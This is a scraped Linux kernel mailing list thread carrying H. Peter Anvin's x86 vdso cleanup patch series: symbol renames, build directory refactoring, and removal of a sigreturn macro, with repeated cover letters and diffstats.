-vdso-image-*.c
-vdso2c
+*.lds
+*.so
+*.so.dbg
+vdso*-image.c
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index f247f5f5cb44..7f833026d5b2 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -16,9 +16,9 @@ vobjs-$(CONFIG_X86_SGX) += vsgx.o
obj-y += vma.o extable.o
# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso-image-64.o
-obj-$(CONFIG_X86_X32_ABI) += vdso-image-x32.o
-obj-$(CONFIG_COMPAT_32) += vdso-image-32.o vdso32-setup.o
+obj-$(CONFIG_X86_64) += vdso64-image.o
+obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
+obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
vobjs := $(addprefix $(obj)/, $(vobjs-y))
vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
@@ -44,7 +44,7 @@ hostprogs += vdso2c
quiet_cmd_vdso2c = VDSO2C $@
cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
-$(obj)/vdso-image-%.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index afe105b2f907..8f98c2d7c7a9 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,7 +65,7 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
struct pt_regs *regs = current_pt_regs();
unsigned long vdso_land = image->sym_int80_landing_pad;
unsigned long old_land_addr = vdso_land +
@@ -230,7 +230,7 @@ static int load_vdso32(void)
if (vdso32_enabled != 1) /* Other values all mean "disabled" */
return 0;
- return map_vdso(&vdso_image_32, 0);
+ return map_vdso(&vdso32_image, 0);
}
int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
@@ -239,7 +239,7 @@ int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_64, 0);
+ return map_vdso(&vdso64_image, 0);
}
return load_vdso32();
@@ -252,7 +252,7 @@ int compat_arch_setup_additional_pages(struct linux_binprm *bprm,
if (IS_ENABLED(CONFIG_X86_X32_ABI) && x32) {
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_x32, 0);
+ return map_vdso(&vdsox32_image, 0);
}
if (IS_ENABLED(CONFIG_IA32_EMULATION))
@@ -267,7 +267,7 @@ bool arch_syscall_is_vdso_sigreturn(struct pt_regs *regs)
const struct vdso_image *image = current->mm->context.vdso_image;
unsigned long vdso = (unsigned long) current->mm->context.vdso;
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
if (regs->ip == vdso + image->sym_vdso32_sigreturn_landing_pad ||
regs->ip == vdso + image->sym_vdso32_rt_sigreturn_landing_pad)
return true;
diff --git a/arch/x86/include/asm/elf.h b/arch/x86/include/asm/elf.h
index 6c8fdc96be7e..2ba5f166e58f 100644
--- a/arch/x86/include/asm/elf.h
+++ b/arch/x86/include/asm/elf.h
@@ -361,7 +361,7 @@ else if (IS_ENABLED(CONFIG_IA32_EMULATION)) \
#define VDSO_ENTRY \
((unsigned long)current->mm->context.vdso + \
- vdso_image_32.sym___kernel_vsyscall)
+ vdso32_image.sym___kernel_vsyscall)
struct linux_binprm;
diff --git a/arch/x86/include/asm/vdso.h b/arch/x86/include/asm/vdso.h
index b7253ef3205a..e8afbe9faa5b 100644
--- a/arch/x86/include/asm/vdso.h
+++ b/arch/x86/include/asm/vdso.h
@@ -27,9 +27,9 @@ struct vdso_image {
long sym_vdso32_rt_sigreturn_landing_pad;
};
-extern const struct vdso_image vdso_image_64;
-extern const struct vdso_image vdso_image_x32;
-extern const struct vdso_image vdso_image_32;
+extern const struct vdso_image vdso64_image;
+extern const struct vdso_image vdsox32_image;
+extern const struct vdso_image vdso32_image;
extern int __init init_vdso_image(const struct vdso_image *image);
diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
index 432c0a004c60..08e72f429870 100644
--- a/arch/x86/kernel/process_64.c
+++ b/arch/x86/kernel/process_64.c
@@ -941,14 +941,14 @@ long do_arch_prctl_64(struct task_struct *task, int option, unsigned long arg2)
#ifdef CONFIG_CHECKPOINT_RESTORE
# ifdef CONFIG_X86_X32_ABI
case ARCH_MAP_VDSO_X32:
- return prctl_map_vdso(&vdso_image_x32, arg2);
+ return prctl_map_vdso(&vdsox32_image, arg2);
# endif
# ifdef CONFIG_IA32_EMULATION
case ARCH_MAP_VDSO_32:
- return prctl_map_vdso(&vdso_image_32, arg2);
+ return prctl_map_vdso(&vdso32_image, arg2);
# endif
case ARCH_MAP_VDSO_64:
- return prctl_map_vdso(&vdso_image_64, arg2);
+ return prctl_map_vdso(&vdso64_image, arg2);
#endif
#ifdef CONFIG_ADDRESS_MASKING
case ARCH_GET_UNTAG_MASK:
diff --git a/arch/x86/kernel/signal_32.c b/arch/x86/kernel/signal_32.c
index 42bbc42bd350..e55cf19e68fe 100644
--- a/arch/x86/kernel/signal_32.c
+++ b/arch/x86/kernel/signal_32.c
@@ -282,7 +282,7 @@ int ia32_setup_frame(struct ksignal *ksig, struct pt_regs *regs)
/* Return stub is in 32bit vsyscall page */
if (current->mm->context.vdso)
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_sigreturn;
+ vdso32_image.sym___kernel_sigreturn;
else
restorer = &frame->retcode;
}
@@ -368,7 +368,7 @@ int ia32_setup_rt_frame(struct ksignal *ksig, struct pt_regs *regs)
restorer = ksig->ka.sa.sa_restorer;
else
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_rt_sigreturn;
+ vdso32_image.sym___kernel_rt_sigreturn;
unsafe_put_user(ptr_to_compat(restorer), &frame->pretcode, Efault);
/*
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:34 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
This is intended as a ping, since I think the v4 got swallowed by the
holidays. v4.1 IS BASICALLY A REBASE AND RESEND OF v4; THE ONLY CODE
CHANGE IS A SINGLE SPACE CHARACTER.
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v4 to v4.1:
- Fix a single bogus whitespace character change in patch 7.
- Fix the spelling of Uros Bizjak's name in the comment to patch 8.
- Rebased onto v6.19-rc4.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- Remove stray comment from prototyping (Uros Bizjak)
- Remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- Indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:33 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
A macro SYSCALL_ENTER_KERNEL was defined in sigreturn.S, with the
ability of overriding it. The override capability, however, is not
used anywhere, and the macro name is potentially confusing because it
seems to imply that sysenter/syscall could be used here, which is NOT
true: the sigreturn system calls MUST use int $0x80.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 8 ++------
1 file changed, 2 insertions(+), 6 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 1bd068f72d4c..965900c6763b 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -3,10 +3,6 @@
#include <asm/unistd_32.h>
#include <asm/asm-offsets.h>
-#ifndef SYSCALL_ENTER_KERNEL
-#define SYSCALL_ENTER_KERNEL int $0x80
-#endif
-
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
@@ -16,7 +12,7 @@ __kernel_sigreturn:
.LSTART_sigreturn:
popl %eax /* XXX does this mean it needs unwind info? */
movl $__NR_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
@@ -28,7 +24,7 @@ SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
__kernel_rt_sigreturn:
.LSTART_rt_sigreturn:
movl $__NR_rt_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:38 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
- Separate out the vdso sources into common, vdso32, and vdso64
directories.
- Build the 32- and 64-bit vdsos in their respective subdirectories;
this greatly simplifies the build flags handling.
- Unify the mangling of Makefile flags between the 32- and 64-bit
vdso code as much as possible; all common rules are put in
arch/x86/entry/vdso/common/Makefile.include. The remaining
is very simple for 32 bits; the 64-bit one is only slightly more
complicated because it contains the x32 generation rule.
- Define __DISABLE_EXPORTS when building the vdso. This need seems to
have been masked by different ordering compile flags before.
- Change CONFIG_X86_64 to BUILD_VDSO32_64 in vdso32/system_call.S,
to make it compatible with including fake_32bit_build.h.
- The -fcf-protection= option was "leaking" from the kernel build,
for reasons that was not clear to me. Futhermore, several
distributions ship with it set to a default value other than
"-fcf-protection=none". Make it match the configuration options
for *user space*.
Note that this patch may seem large, but the vast majority of it is
simply code movement.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/Makefile | 161 +-----------------
arch/x86/entry/vdso/common/Makefile.include | 89 ++++++++++
.../entry/vdso/{vdso-note.S => common/note.S} | 5 +-
.../entry/vdso/{ => common}/vclock_gettime.c | 0
.../entry/vdso/{ => common}/vdso-layout.lds.S | 0
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/system_call.S | 2 +-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 +++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
.../x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
21 files changed, 180 insertions(+), 186 deletions(-)
create mode 100644 arch/x86/entry/vdso/common/Makefile.include
rename arch/x86/entry/vdso/{vdso-note.S => common/note.S} (62%)
rename arch/x86/entry/vdso/{ => common}/vclock_gettime.c (100%)
rename arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S (100%)
rename arch/x86/entry/vdso/{ => common}/vgetcpu.c (100%)
create mode 100644 arch/x86/entry/vdso/vdso32/Makefile
